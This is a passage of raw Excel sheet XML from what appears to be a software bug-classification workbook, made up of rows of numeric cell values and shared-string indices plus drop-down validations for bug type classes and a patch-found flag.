      <c r="D209" s="6" t="s">
        <v>28</v>
      </c>
      <c r="E209" s="6" t="s">
        <v>28</v>
      </c>
      <c r="F209" s="6" t="s">
        <v>37</v>
      </c>
      <c r="G209" s="6" t="s">
        <v>11546</v>
      </c>
      <c r="H209" s="6" t="s">
        <v>25144</v>
      </c>
      <c r="I209" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J209" s="6" t="s">
        <v>25145</v>
      </c>
      <c r="K209" s="6" t="s">
        <v>22440</v>
      </c>
      <c r="L209" s="6" t="s">
        <v>25146</v>
      </c>
      <c r="M209" s="6" t="s">
        <v>3527</v>
      </c>
      <c r="N209" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O209" s="6">
        <v>2</v>
      </c>
      <c r="P209" s="6" t="s">
        <v>25147</v>
      </c>
    </row>
    <row r="210" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A210" s="6">
        <v>42736</v>
      </c>
      <c r="B210" s="6" t="s">
        <v>25580</v>
      </c>
      <c r="C210" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D210" s="6" t="s">
        <v>43</v>
      </c>
      <c r="E210" s="6" t="s">
        <v>6179</v>
      </c>
      <c r="F210" s="6" t="s">
        <v>37</v>
      </c>
      <c r="G210" s="6" t="s">
        <v>11546</v>
      </c>
      <c r="H210" s="6" t="s">
        <v>25581</v>
      </c>
      <c r="I210" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J210" s="6" t="s">
        <v>25582</v>
      </c>
      <c r="K210" s="6" t="s">
        <v>25583</v>
      </c>
      <c r="L210" s="6" t="s">
        <v>25584</v>
      </c>
      <c r="M210" s="6" t="s">
        <v>24558</v>
      </c>
      <c r="N210" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O210" s="6">
        <v>15</v>
      </c>
      <c r="P210" s="6" t="s">
        <v>25585</v>
      </c>
    </row>
    <row r="211" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A211" s="6">
        <v>43991</v>
      </c>
      <c r="B211" s="6" t="s">
        <v>25867</v>
      </c>
      <c r="C211" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D211" s="6" t="s">
        <v>152</v>
      </c>
      <c r="E211" s="6" t="s">
        <v>28</v>
      </c>
      <c r="F211" s="6" t="s">
        <v>37</v>
      </c>
      <c r="G211" s="6" t="s">
        <v>11536</v>
      </c>
      <c r="H211" s="6" t="s">
        <v>25868</v>
      </c>
      <c r="I211" s="6" t="s">
        <v>11549</v>
      </c>
      <c r="J211" s="6" t="s">
        <v>25869</v>
      </c>
      <c r="K211" s="6" t="s">
        <v>25870</v>
      </c>
      <c r="L211" s="6" t="s">
        <v>25871</v>
      </c>
      <c r="M211" s="6" t="s">
        <v>299</v>
      </c>
      <c r="N211" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O211" s="6">
        <v>0</v>
      </c>
      <c r="P211" s="6" t="s">
        <v>25872</v>
      </c>
    </row>
    <row r="212" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A212" s="6">
        <v>49251</v>
      </c>
      <c r="B212" s="6" t="s">
        <v>28167</v>
      </c>
      <c r="C212" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D212" s="6" t="s">
        <v>28</v>
      </c>
      <c r="E212" s="6" t="s">
        <v>28</v>
      </c>
      <c r="F212" s="6" t="s">
        <v>37</v>
      </c>
      <c r="G212" s="6" t="s">
        <v>11536</v>
      </c>
      <c r="H212" s="6" t="s">
        <v>26081</v>
      </c>
      <c r="I212" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J212" s="6" t="s">
        <v>26082</v>
      </c>
      <c r="K212" s="6" t="s">
        <v>26083</v>
      </c>
      <c r="L212" s="6" t="s">
        <v>26084</v>
      </c>
      <c r="M212" s="6" t="s">
        <v>4704</v>
      </c>
      <c r="N212" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O212" s="6">
        <v>2</v>
      </c>
      <c r="P212" s="6" t="s">
        <v>26085</v>
      </c>
    </row>
    <row r="213" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A213" s="6">
        <v>49261</v>
      </c>
      <c r="B213" s="6" t="s">
        <v>28167</v>
      </c>
      <c r="C213" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D213" s="6" t="s">
        <v>28</v>
      </c>
      <c r="E213" s="6" t="s">
        <v>28</v>
      </c>
      <c r="F213" s="6" t="s">
        <v>37</v>
      </c>
      <c r="G213" s="6" t="s">
        <v>11536</v>
      </c>
      <c r="H213" s="6" t="s">
        <v>26081</v>
      </c>
      <c r="I213" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J213" s="6" t="s">
        <v>26086</v>
      </c>
      <c r="K213" s="6" t="s">
        <v>26083</v>
      </c>
      <c r="L213" s="6" t="s">
        <v>26087</v>
      </c>
      <c r="M213" s="6" t="s">
        <v>4704</v>
      </c>
      <c r="N213" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O213" s="6">
        <v>2</v>
      </c>
      <c r="P213" s="6" t="s">
        <v>26088</v>
      </c>
    </row>
    <row r="214" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A214" s="6">
        <v>53731</v>
      </c>
      <c r="B214" s="6" t="s">
        <v>26297</v>
      </c>
      <c r="C214" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D214" s="6" t="s">
        <v>43</v>
      </c>
      <c r="E214" s="6" t="s">
        <v>6179</v>
      </c>
      <c r="F214" s="6" t="s">
        <v>37</v>
      </c>
      <c r="G214" s="6" t="s">
        <v>11536</v>
      </c>
      <c r="H214" s="6" t="s">
        <v>26298</v>
      </c>
      <c r="I214" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J214" s="6" t="s">
        <v>26299</v>
      </c>
      <c r="K214" s="6" t="s">
        <v>18787</v>
      </c>
      <c r="L214" s="6" t="s">
        <v>26300</v>
      </c>
      <c r="M214" s="6" t="s">
        <v>8165</v>
      </c>
      <c r="N214" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O214" s="6">
        <v>1</v>
      </c>
      <c r="P214" s="6" t="s">
        <v>26301</v>
      </c>
    </row>
    <row r="215" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A215" s="6">
        <v>54851</v>
      </c>
      <c r="B215" s="6" t="s">
        <v>26368</v>
      </c>
      <c r="C215" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D215" s="6" t="s">
        <v>111</v>
      </c>
      <c r="E215" s="6" t="s">
        <v>9315</v>
      </c>
      <c r="F215" s="6" t="s">
        <v>37</v>
      </c>
      <c r="G215" s="6" t="s">
        <v>11536</v>
      </c>
      <c r="H215" s="6">
        <v>3.9</v>
      </c>
      <c r="I215" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J215" s="6" t="s">
        <v>26369</v>
      </c>
      <c r="K215" s="6" t="s">
        <v>17090</v>
      </c>
      <c r="L215" s="6" t="s">
        <v>26370</v>
      </c>
      <c r="M215" s="6" t="s">
        <v>10241</v>
      </c>
      <c r="N215" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O215" s="6">
        <v>19</v>
      </c>
      <c r="P215" s="6" t="s">
        <v>26371</v>
      </c>
    </row>
    <row r="216" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A216" s="6">
        <v>59481</v>
      </c>
      <c r="B216" s="6" t="s">
        <v>26664</v>
      </c>
      <c r="C216" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D216" s="6" t="s">
        <v>1460</v>
      </c>
      <c r="E216" s="6" t="s">
        <v>3174</v>
      </c>
      <c r="F216" s="6" t="s">
        <v>37</v>
      </c>
      <c r="G216" s="6" t="s">
        <v>11536</v>
      </c>
      <c r="H216" s="6" t="s">
        <v>26665</v>
      </c>
      <c r="I216" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J216" s="6" t="s">
        <v>26666</v>
      </c>
      <c r="K216" s="6" t="s">
        <v>26667</v>
      </c>
      <c r="L216" s="6" t="s">
        <v>26668</v>
      </c>
      <c r="M216" s="6" t="s">
        <v>26469</v>
      </c>
      <c r="N216" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O216" s="6">
        <v>31</v>
      </c>
      <c r="P216" s="6" t="s">
        <v>26669</v>
      </c>
    </row>
    <row r="217" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A217" s="6">
        <v>60727</v>
      </c>
      <c r="B217" s="6" t="s">
        <v>26828</v>
      </c>
      <c r="C217" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D217" s="6" t="s">
        <v>1460</v>
      </c>
      <c r="E217" s="6" t="s">
        <v>3174</v>
      </c>
      <c r="F217" s="6" t="s">
        <v>37</v>
      </c>
      <c r="G217" s="6" t="s">
        <v>11536</v>
      </c>
      <c r="H217" s="6" t="s">
        <v>26829</v>
      </c>
      <c r="I217" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J217" s="6" t="s">
        <v>26830</v>
      </c>
      <c r="K217" s="6" t="s">
        <v>26438</v>
      </c>
      <c r="L217" s="6" t="s">
        <v>26831</v>
      </c>
      <c r="M217" s="6" t="s">
        <v>26469</v>
      </c>
      <c r="N217" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O217" s="6">
        <v>7</v>
      </c>
      <c r="P217" s="6" t="s">
        <v>28218</v>
      </c>
    </row>
    <row r="218" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A218" s="6">
        <v>60735</v>
      </c>
      <c r="B218" s="6" t="s">
        <v>26832</v>
      </c>
      <c r="C218" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D218" s="6" t="s">
        <v>111</v>
      </c>
      <c r="E218" s="6" t="s">
        <v>28</v>
      </c>
      <c r="F218" s="6" t="s">
        <v>37</v>
      </c>
      <c r="G218" s="6" t="s">
        <v>11546</v>
      </c>
      <c r="H218" s="6" t="s">
        <v>26833</v>
      </c>
      <c r="I218" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J218" s="6" t="s">
        <v>26834</v>
      </c>
      <c r="K218" s="6" t="s">
        <v>26835</v>
      </c>
      <c r="L218" s="6" t="s">
        <v>26836</v>
      </c>
      <c r="M218" s="6" t="s">
        <v>995</v>
      </c>
      <c r="N218" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O218" s="6">
        <v>11</v>
      </c>
      <c r="P218" s="6" t="s">
        <v>26837</v>
      </c>
    </row>
    <row r="219" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A219" s="6">
        <v>63191</v>
      </c>
      <c r="B219" s="6" t="s">
        <v>26967</v>
      </c>
      <c r="C219" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D219" s="6" t="s">
        <v>51</v>
      </c>
      <c r="E219" s="6" t="s">
        <v>1203</v>
      </c>
      <c r="F219" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G219" s="6" t="s">
        <v>11596</v>
      </c>
      <c r="H219" s="6" t="s">
        <v>26961</v>
      </c>
      <c r="I219" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J219" s="6" t="s">
        <v>26968</v>
      </c>
      <c r="K219" s="6" t="s">
        <v>26969</v>
      </c>
      <c r="L219" s="6" t="s">
        <v>26970</v>
      </c>
      <c r="M219" s="6" t="s">
        <v>21160</v>
      </c>
      <c r="N219" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O219" s="6">
        <v>5</v>
      </c>
      <c r="P219" s="6" t="s">
        <v>26971</v>
      </c>
    </row>
    <row r="220" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A220" s="6">
        <v>63221</v>
      </c>
      <c r="B220" s="6" t="s">
        <v>26972</v>
      </c>
      <c r="C220" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D220" s="6" t="s">
        <v>43</v>
      </c>
      <c r="E220" s="6" t="s">
        <v>6179</v>
      </c>
      <c r="F220" s="6" t="s">
        <v>19481</v>
      </c>
      <c r="G220" s="6" t="s">
        <v>11536</v>
      </c>
      <c r="H220" s="6" t="s">
        <v>26973</v>
      </c>
      <c r="I220" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J220" s="6" t="s">
        <v>26974</v>
      </c>
      <c r="K220" s="6" t="s">
        <v>26975</v>
      </c>
      <c r="L220" s="6" t="s">
        <v>26976</v>
      </c>
      <c r="M220" s="6" t="s">
        <v>8165</v>
      </c>
      <c r="N220" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O220" s="6">
        <v>2</v>
      </c>
      <c r="P220" s="6" t="s">
        <v>26977</v>
      </c>
    </row>
    <row r="221" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A221" s="6">
        <v>64261</v>
      </c>
      <c r="B221" s="6" t="s">
        <v>26989</v>
      </c>
      <c r="C221" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D221" s="6" t="s">
        <v>1460</v>
      </c>
      <c r="E221" s="6" t="s">
        <v>26990</v>
      </c>
      <c r="F221" s="6" t="s">
        <v>37</v>
      </c>
      <c r="G221" s="6" t="s">
        <v>11536</v>
      </c>
      <c r="H221" s="6" t="s">
        <v>26985</v>
      </c>
      <c r="I221" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J221" s="6" t="s">
        <v>26991</v>
      </c>
      <c r="K221" s="6" t="s">
        <v>26667</v>
      </c>
      <c r="L221" s="6" t="s">
        <v>26992</v>
      </c>
      <c r="M221" s="6" t="s">
        <v>26469</v>
      </c>
      <c r="N221" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O221" s="6">
        <v>22</v>
      </c>
      <c r="P221" s="6" t="s">
        <v>26993</v>
      </c>
    </row>
    <row r="222" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A222" s="6">
        <v>67901</v>
      </c>
      <c r="B222" s="6" t="s">
        <v>27068</v>
      </c>
      <c r="C222" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D222" s="6" t="s">
        <v>51</v>
      </c>
      <c r="E222" s="6" t="s">
        <v>744</v>
      </c>
      <c r="F222" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G222" s="6" t="s">
        <v>11546</v>
      </c>
      <c r="H222" s="6">
        <v>3.1</v>
      </c>
      <c r="I222" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J222" s="6" t="s">
        <v>27069</v>
      </c>
      <c r="K222" s="6" t="s">
        <v>25878</v>
      </c>
      <c r="L222" s="6" t="s">
        <v>27070</v>
      </c>
      <c r="M222" s="6" t="s">
        <v>25878</v>
      </c>
      <c r="N222" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O222" s="6">
        <v>22</v>
      </c>
      <c r="P222" s="6" t="s">
        <v>27071</v>
      </c>
    </row>
    <row r="223" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A223" s="6">
        <v>92451</v>
      </c>
      <c r="B223" s="6" t="s">
        <v>27535</v>
      </c>
      <c r="C223" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D223" s="6" t="s">
        <v>43</v>
      </c>
      <c r="E223" s="6" t="s">
        <v>6179</v>
      </c>
      <c r="F223" s="6" t="s">
        <v>26984</v>
      </c>
      <c r="G223" s="6" t="s">
        <v>11536</v>
      </c>
      <c r="H223" s="6" t="s">
        <v>27536</v>
      </c>
      <c r="I223" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J223" s="6" t="s">
        <v>27537</v>
      </c>
      <c r="K223" s="6" t="s">
        <v>27538</v>
      </c>
      <c r="L223" s="6" t="s">
        <v>27539</v>
      </c>
      <c r="M223" s="6" t="s">
        <v>8165</v>
      </c>
      <c r="N223" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O223" s="6">
        <v>20</v>
      </c>
      <c r="P223" s="6" t="s">
        <v>27540</v>
      </c>
    </row>
    <row r="224" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A224" s="6">
        <v>100291</v>
      </c>
      <c r="B224" s="6" t="s">
        <v>27670</v>
      </c>
      <c r="C224" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D224" s="6" t="s">
        <v>22</v>
      </c>
      <c r="E224" s="6" t="s">
        <v>308</v>
      </c>
      <c r="F224" s="6" t="s">
        <v>37</v>
      </c>
      <c r="G224" s="6" t="s">
        <v>11536</v>
      </c>
      <c r="H224" s="6" t="s">
        <v>27671</v>
      </c>
      <c r="I224" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J224" s="6" t="s">
        <v>27672</v>
      </c>
      <c r="K224" s="6" t="s">
        <v>27673</v>
      </c>
      <c r="L224" s="6" t="s">
        <v>27674</v>
      </c>
      <c r="M224" s="6" t="s">
        <v>4640</v>
      </c>
      <c r="N224" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O224" s="6">
        <v>1</v>
      </c>
      <c r="P224" s="6" t="s">
        <v>27675</v>
      </c>
    </row>
    <row r="225" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A225" s="6">
        <v>150021</v>
      </c>
      <c r="B225" s="6" t="s">
        <v>28078</v>
      </c>
      <c r="C225" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D225" s="6" t="s">
        <v>1460</v>
      </c>
      <c r="E225" s="6" t="s">
        <v>6599</v>
      </c>
      <c r="F225" s="6" t="s">
        <v>37</v>
      </c>
      <c r="G225" s="6" t="s">
        <v>11536</v>
      </c>
      <c r="H225" s="6" t="s">
        <v>28079</v>
      </c>
      <c r="I225" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J225" s="6" t="s">
        <v>28080</v>
      </c>
      <c r="K225" s="6" t="s">
        <v>28081</v>
      </c>
      <c r="L225" s="6" t="s">
        <v>28082</v>
      </c>
      <c r="M225" s="6" t="s">
        <v>2379</v>
      </c>
      <c r="N225" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O225" s="6">
        <v>19</v>
      </c>
      <c r="P225" s="6" t="s">
        <v>28083</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S225" xr:uid="{71947E26-A9EA-441C-AA5A-D0771F135015}"/>
  <phoneticPr fontId="1" type="noConversion"/>
  <dataValidations count="3">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" prompt="bug type subclasses" sqref="C23" xr:uid="{00000000-0002-0000-0600-000000000000}">
      <formula1>"MEM,STO,LOG,NUM,TOT,ARU,LAG,ENV,TIM,SEQ,NAU"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" prompt="bug type classes" sqref="B23" xr:uid="{00000000-0002-0000-0600-000001000000}">
      <formula1>"ARB,NAM,BOH,UNK"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" prompt="patch found: yes_x000a_patch not found: no" sqref="D23" xr:uid="{00000000-0002-0000-0600-000002000000}">
      <formula1>"YES,NO"</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9"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47"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="2" max="2" width="50.4140625" customWidth="1"/>
    <col min="3" max="3" width="16.4140625" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="23.33203125" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="19" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="11.6640625" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="10.1640625" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="28.08203125" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="7.83203125" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="20.5" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="21.5" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="20.5" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="40.5" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="11.83203125" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="16.6640625" bestFit="1" customWidth="1"/>
    <col min="16" max="16" width="14.9140625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:16" s="10" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A1" s="9" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="9" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="9" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="9" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="9" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="9" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="9" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="9" t="s">
        <v>28170</v>
      </c>
      <c r="I1" s="9" t="s">
        <v>7</v>
      </c>
      <c r="J1" s="9" t="s">
        <v>8</v>
      </c>
      <c r="K1" s="9" t="s">
        <v>9</v>
      </c>
      <c r="L1" s="9" t="s">
        <v>10</v>
      </c>
      <c r="M1" s="9" t="s">
        <v>28172</v>
      </c>
      <c r="N1" s="9" t="s">
        <v>28165</v>
      </c>
      <c r="O1" s="9" t="s">
        <v>11</v>
      </c>
      <c r="P1" s="9" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="2" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A2">
        <v>1265</v>
      </c>
      <c r="B2" t="s">
        <v>2779</v>
      </c>
      <c r="C2" t="s">
        <v>21</v>
      </c>
      <c r="D2" t="s">
        <v>51</v>
      </c>
      <c r="E2" t="s">
        <v>2488</v>
      </c>
      <c r="F2" t="s">
        <v>350</v>
      </c>
      <c r="G2" t="s">
        <v>16</v>
      </c>
      <c r="H2" t="s">
        <v>2489</v>
      </c>
      <c r="I2" t="s">
        <v>17</v>
      </c>
      <c r="J2" t="s">
        <v>2780</v>
      </c>
      <c r="K2" t="s">
        <v>2781</v>
      </c>
      <c r="L2" t="s">
        <v>2782</v>
      </c>
      <c r="M2" t="s">
        <v>2391</v>
      </c>
      <c r="N2">
        <v>1326</v>
      </c>
      <c r="O2">
        <v>19</v>
      </c>
      <c r="P2" t="s">
        <v>2783</v>
      </c>
    </row>
    <row r="3" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A3">
        <v>7156</v>
      </c>
      <c r="B3" t="s">
        <v>9672</v>
      </c>
      <c r="C3" t="s">
        <v>21</v>
      </c>
      <c r="D3" t="s">
        <v>13</v>
      </c>
      <c r="E3" t="s">
        <v>129</v>
      </c>
      <c r="F3" t="s">
        <v>350</v>
      </c>
      <c r="G3" t="s">
        <v>66</v>
      </c>
      <c r="H3" t="s">
        <v>9673</v>
      </c>
      <c r="I3" t="s">
        <v>17</v>
      </c>
      <c r="J3" t="s">
        <v>9674</v>
      </c>
      <c r="K3" t="s">
        <v>9675</v>
      </c>
      <c r="L3" t="s">
        <v>9676</v>
      </c>
      <c r="M3" t="s">
        <v>9070</v>
      </c>
      <c r="N3" t="s">
        <v>20</v>
      </c>
      <c r="O3">
        <v>3</v>
      </c>
      <c r="P3" t="s">
        <v>9677</v>
      </c>
    </row>
    <row r="4" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A4">
        <v>7262</v>
      </c>
      <c r="B4" t="s">
        <v>9799</v>
      </c>
      <c r="C4" t="s">
        <v>21</v>
      </c>
      <c r="D4" t="s">
        <v>13</v>
      </c>
      <c r="E4" t="s">
        <v>302</v>
      </c>
      <c r="F4" t="s">
        <v>350</v>
      </c>
      <c r="G4" t="s">
        <v>16</v>
      </c>
      <c r="H4" t="s">
        <v>9171</v>
      </c>
      <c r="I4" t="s">
        <v>17</v>
      </c>
      <c r="J4" t="s">
        <v>9800</v>
      </c>
      <c r="K4" t="s">
        <v>9801</v>
      </c>
      <c r="L4" t="s">
        <v>9802</v>
      </c>
      <c r="M4" t="s">
        <v>1864</v>
      </c>
      <c r="N4" t="s">
        <v>20</v>
      </c>
      <c r="O4">
        <v>2</v>
      </c>
      <c r="P4" t="s">
        <v>9803</v>
      </c>
    </row>
    <row r="5" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A5">
        <v>8342</v>
      </c>
      <c r="B5" t="s">
        <v>11157</v>
      </c>
      <c r="C5" t="s">
        <v>21</v>
      </c>
      <c r="D5" t="s">
        <v>111</v>
      </c>
      <c r="E5" t="s">
        <v>28</v>
      </c>
      <c r="F5" t="s">
        <v>350</v>
      </c>
      <c r="G5" t="s">
        <v>16</v>
      </c>
      <c r="H5" t="s">
        <v>10038</v>
      </c>
      <c r="I5" t="s">
        <v>17</v>
      </c>
      <c r="J5" t="s">
        <v>11158</v>
      </c>
      <c r="K5" t="s">
        <v>11140</v>
      </c>
      <c r="L5" t="s">
        <v>11159</v>
      </c>
      <c r="M5" t="s">
        <v>323</v>
      </c>
      <c r="N5" t="s">
        <v>20</v>
      </c>
      <c r="O5">
        <v>2</v>
      </c>
      <c r="P5" t="s">
        <v>11160</v>
      </c>
    </row>
    <row r="6" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A6">
        <v>8449</v>
      </c>
      <c r="B6" t="s">
        <v>11323</v>
      </c>
      <c r="C6" t="s">
        <v>21</v>
      </c>
      <c r="D6" t="s">
        <v>43</v>
      </c>
      <c r="E6" t="s">
        <v>44</v>
      </c>
      <c r="F6" t="s">
        <v>350</v>
      </c>
      <c r="G6" t="s">
        <v>53</v>
      </c>
      <c r="H6" t="s">
        <v>11111</v>
      </c>
      <c r="I6" t="s">
        <v>17</v>
      </c>
      <c r="J6" t="s">
        <v>11324</v>
      </c>
      <c r="K6" t="s">
        <v>3722</v>
      </c>
      <c r="L6" t="s">
        <v>11325</v>
      </c>
      <c r="M6" t="s">
        <v>93</v>
      </c>
      <c r="N6" t="s">
        <v>20</v>
      </c>
      <c r="O6">
        <v>6</v>
      </c>
      <c r="P6" t="s">
        <v>11326</v>
      </c>
    </row>
    <row r="7" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A7">
        <v>8730</v>
      </c>
      <c r="B7" t="s">
        <v>11665</v>
      </c>
      <c r="C7" t="s">
        <v>21</v>
      </c>
      <c r="D7" t="s">
        <v>13</v>
      </c>
      <c r="E7" t="s">
        <v>3068</v>
      </c>
      <c r="F7" t="s">
        <v>37</v>
      </c>
      <c r="G7" t="s">
        <v>11536</v>
      </c>
      <c r="H7" t="s">
        <v>11461</v>
      </c>
      <c r="I7" t="s">
        <v>17</v>
      </c>
      <c r="J7" t="s">
        <v>11666</v>
      </c>
      <c r="K7" t="s">
        <v>11667</v>
      </c>
      <c r="L7" t="s">
        <v>11668</v>
      </c>
      <c r="M7" t="s">
        <v>5765</v>
      </c>
      <c r="N7" t="s">
        <v>20</v>
      </c>
      <c r="O7">
        <v>1</v>
      </c>
      <c r="P7" t="s">
        <v>11669</v>
      </c>
    </row>
    <row r="8" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A8">
        <v>8847</v>
      </c>
      <c r="B8" t="s">
        <v>11848</v>
      </c>
      <c r="C8" t="s">
        <v>21</v>
      </c>
      <c r="D8" t="s">
        <v>43</v>
      </c>
      <c r="E8" t="s">
        <v>96</v>
      </c>
      <c r="F8" t="s">
        <v>37</v>
      </c>
      <c r="G8" t="s">
        <v>11536</v>
      </c>
      <c r="H8" t="s">
        <v>8228</v>
      </c>
      <c r="I8" t="s">
        <v>17</v>
      </c>
      <c r="J8" t="s">
        <v>11849</v>
      </c>
      <c r="K8" t="s">
        <v>9286</v>
      </c>
      <c r="L8" t="s">
        <v>11850</v>
      </c>
      <c r="M8" t="s">
        <v>3902</v>
      </c>
      <c r="N8">
        <v>8844</v>
      </c>
      <c r="O8">
        <v>4</v>
      </c>
      <c r="P8" t="s">
        <v>11851</v>
      </c>
    </row>
    <row r="9" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A9">
        <v>9323</v>
      </c>
      <c r="B9" t="s">
        <v>12540</v>
      </c>
      <c r="C9" t="s">
        <v>21</v>
      </c>
      <c r="D9" t="s">
        <v>27</v>
      </c>
      <c r="E9" t="s">
        <v>28</v>
      </c>
      <c r="F9" t="s">
        <v>37</v>
      </c>
      <c r="G9" t="s">
        <v>11536</v>
      </c>
      <c r="H9" t="s">
        <v>12135</v>
      </c>
      <c r="I9" t="s">
        <v>17</v>
      </c>
      <c r="J9" t="s">
        <v>12541</v>
      </c>
      <c r="K9" t="s">
        <v>2379</v>
      </c>
      <c r="L9" t="s">
        <v>12542</v>
      </c>
      <c r="M9" t="s">
        <v>222</v>
      </c>
      <c r="N9" t="s">
        <v>20</v>
      </c>
      <c r="O9">
        <v>2</v>
      </c>
      <c r="P9" t="s">
        <v>12543</v>
      </c>
    </row>
    <row r="10" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A10">
        <v>9644</v>
      </c>
      <c r="B10" t="s">
        <v>13143</v>
      </c>
      <c r="C10" t="s">
        <v>21</v>
      </c>
      <c r="D10" t="s">
        <v>51</v>
      </c>
      <c r="E10" t="s">
        <v>28</v>
      </c>
      <c r="F10" t="s">
        <v>37</v>
      </c>
      <c r="G10" t="s">
        <v>11536</v>
      </c>
      <c r="H10" t="s">
        <v>13113</v>
      </c>
      <c r="I10" t="s">
        <v>17</v>
      </c>
      <c r="J10" t="s">
        <v>13144</v>
      </c>
      <c r="K10" t="s">
        <v>13140</v>
      </c>
      <c r="L10" t="s">
        <v>13145</v>
      </c>
      <c r="M10" t="s">
        <v>13140</v>
      </c>
      <c r="N10" t="s">
        <v>20</v>
      </c>
      <c r="O10">
        <v>3</v>
      </c>
